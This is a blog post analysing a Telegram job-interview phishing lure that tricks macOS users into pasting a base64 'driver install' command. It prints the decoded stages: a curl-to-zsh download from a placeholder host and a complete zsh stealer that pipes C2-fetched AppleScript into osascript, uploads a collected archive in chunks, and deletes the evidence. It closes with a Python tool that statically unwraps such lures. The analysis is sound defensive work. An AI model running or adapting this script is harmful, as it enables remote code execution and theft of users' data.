A Close Look at Tg Phishing

All code in this post has been sanitized.

I have been looking at new job opportunities recently, and one contact asked me to add them on tg. That seemed harmless enough, so we talked on tg. The more we chatted, the less their messages read like something a human had typed; the word choice and sentence structure were off in a way that is hard to describe.

Eventually the interview link arrived. Opening it produced a popup telling me to copy a command to install a driver. Phishing at first glance.

Curiosity got the better of me, so I copied the command to take a look. It was the most basic form: echo | base64 -d | zsh. Decoding it gives:

```zsh
echo 'The sound carder drver certificate is currently beinginstalledand updated. Please wait...' & curl xxx.evil/xxx | zsh
```

So it downloads yet another script. Keep digging. That one is a script that base64-decodes a compressed archive, extracts it and passes the result to eval. Extracting it gives the following:

```zsh
#!/bin/zsh
daemon_function() {
  # Detach from the terminal: no input, no visible output.
  exec </dev/null
  exec >/dev/null
  exec 2>/dev/null
  local domain="evil.com"
  local token="xxxx"
  local api_key="xx"
  local file="/tmp/osalogging.zip"
  # Stage one: fetch an AppleScript payload from the C2 and hand it to osascript.
  if [ $# -gt 0 ]; then
    curl -k -s --max-time 30 \
      -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
      -H "api-key: $api_key" \
      "http://$domain/dynamic?txd=$token&pwd=$1" | osascript
  else
    curl -k -s --max-time 30 \
      -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
      -H "api-key: $api_key" \
      "http://$domain/dynamic?txd=$token" | osascript
  fi
  if [ $? -ne 0 ]; then
    exit 1
  fi
  # Stage two: the archive the AppleScript is expected to leave behind.
  if [[ ! -f "$file" || ! -s "$file" ]]; then
    return 1
  fi
  local CHUNK_SIZE=$((10 * 1024 * 1024))
  local MAX_RETRIES=8
  local upload_id=$(date +%s)-$(openssl rand -hex 8 2>/dev/null || echo $RANDOM$RANDOM)
  local total_size
  total_size=$(stat -f %z "$file" 2>/dev/null || stat -c %s "$file")
  if [[ -z "$total_size" || "$total_size" -eq 0 ]]; then
    return 1
  fi
  local total_chunks=$(( (total_size + CHUNK_SIZE - 1) / CHUNK_SIZE ))
  local i=0
  # Upload the archive in 10 MiB chunks, retrying each chunk with a growing back-off.
  while (( i < total_chunks )); do
    local offset=$((i * CHUNK_SIZE))
    local chunk_size=$CHUNK_SIZE
    (( offset + chunk_size > total_size )) && chunk_size=$((total_size - offset))
    local success=0
    local attempt=1
    while (( attempt <= MAX_RETRIES && success == 0 )); do
      http_code=$(dd if="$file" bs=1 skip=$offset count=$chunk_size 2>/dev/null | \
        curl -k -s -X PUT \
          --data-binary @- \
          -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
          -H "api-key: $api_key" \
          --max-time 180 \
          -o /dev/null \
          -w "%{http_code}" \
          "http://$domain/gate?buildtxd=$token&upload_id=$upload_id&chunk_index=$i&total_chunks=$total_chunks" 2>/dev/null)
      curl_status=$?
      if [[ $curl_status -eq 0 && $http_code -ge 200 && $http_code -lt 300 ]]; then
        success=1
      else
        ((attempt++))
        sleep $((3 + attempt * 2))
      fi
    done
    if (( success == 0 )); then
      return 1
    fi
    ((i++))
  done
  # Remove the evidence once the upload succeeds.
  rm -f "$file"
  return 0
}
# Run the whole thing in the background and return immediately.
if daemon_function "$@" & then
  exit 0
else
  exit 1
fi
```

Finally, a script that actually does something, and what it does is simple: download a malicious script and hand it to osascript to execute, then upload the local /tmp/osalogging.zip archive ...
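The unwrapping done by hand above (a base64 layer, then a base64-wrapped compressed archive fed to eval) can be done statically. The following Python is an added example, not code from the post: it peels such layers off a lure without executing anything and reports the fetch URLs and execution sinks (| zsh, | osascript, eval) found at each layer. The sample lure and dropper are constructed, with evil.example as a placeholder host.

```python
import base64, bz2, gzip, io, lzma, re, zipfile

# Runs of base64 text long enough to hide a script are treated as candidate payloads.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
URL = re.compile(r"https?://[^\s'\"|;&)]+")
# Execution sinks seen in this lure chain: piping into a shell or osascript, or eval.
SINK = re.compile(r"\|\s*(zsh|bash|sh|osascript)\b|\beval\b")
MAGIC = {b"\x1f\x8b": ("gzip", gzip.decompress), b"BZh": ("bzip2", bz2.decompress),
         b"\xfd7zXZ\x00": ("xz", lzma.decompress)}

def _inflate(blob):
    """Decompress if the blob starts with a known magic, otherwise pass it through."""
    for magic, (name, fn) in MAGIC.items():
        if blob.startswith(magic):
            return name, fn(blob)
    if blob.startswith(b"PK\x03\x04"):  # zip archive: concatenate member contents
        with zipfile.ZipFile(io.BytesIO(blob)) as z:
            return "zip", b"\n".join(z.read(n) for n in z.namelist())
    return "raw", blob

def unwrap(command, max_depth=8):
    """Statically peel base64/compression layers off a lure; nothing is executed."""
    layers, text = [], command
    for depth in range(max_depth):
        layers.append({"depth": depth, "text": text, "urls": URL.findall(text),
                       "sinks": sorted({m.group(0).strip() for m in SINK.finditer(text)})})
        nxt = None
        for tok in B64_TOKEN.findall(text):
            try:
                fmt, data = _inflate(base64.b64decode(tok, validate=True))
                nxt = data.decode("utf-8")  # recurse only into textual payloads
                layers[-1]["wrapping"] = "base64+" + fmt
                break
            except Exception:  # not base64, not a known archive, or binary: skip token
                continue
        if nxt is None:
            break
        text = nxt
    return layers

# Constructed samples mirroring the chain in the post (hypothetical host, not a real IoC).
FINAL = "#!/bin/zsh\ncurl -k -s 'http://evil.example/dynamic?txd=TOKEN' | osascript\n"
DROPPER = ('eval "$(echo ' + base64.b64encode(gzip.compress(FINAL.encode())).decode()
           + ' | base64 -d | gunzip)"')
STAGE1 = ("echo 'The sound card driver certificate is being installed. Please wait...' & "
          "curl http://evil.example/x | zsh")
LURE = "echo " + base64.b64encode(STAGE1.encode()).decode() + " | base64 -d | zsh"
```

Calling unwrap(LURE) yields two layers (the base64 wrapper, then the curl | zsh stage) and unwrap(DROPPER) yields the eval wrapper followed by the curl | osascript script, each with its URLs and sinks listed.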

April 2, 2026 · 4 min · 🦉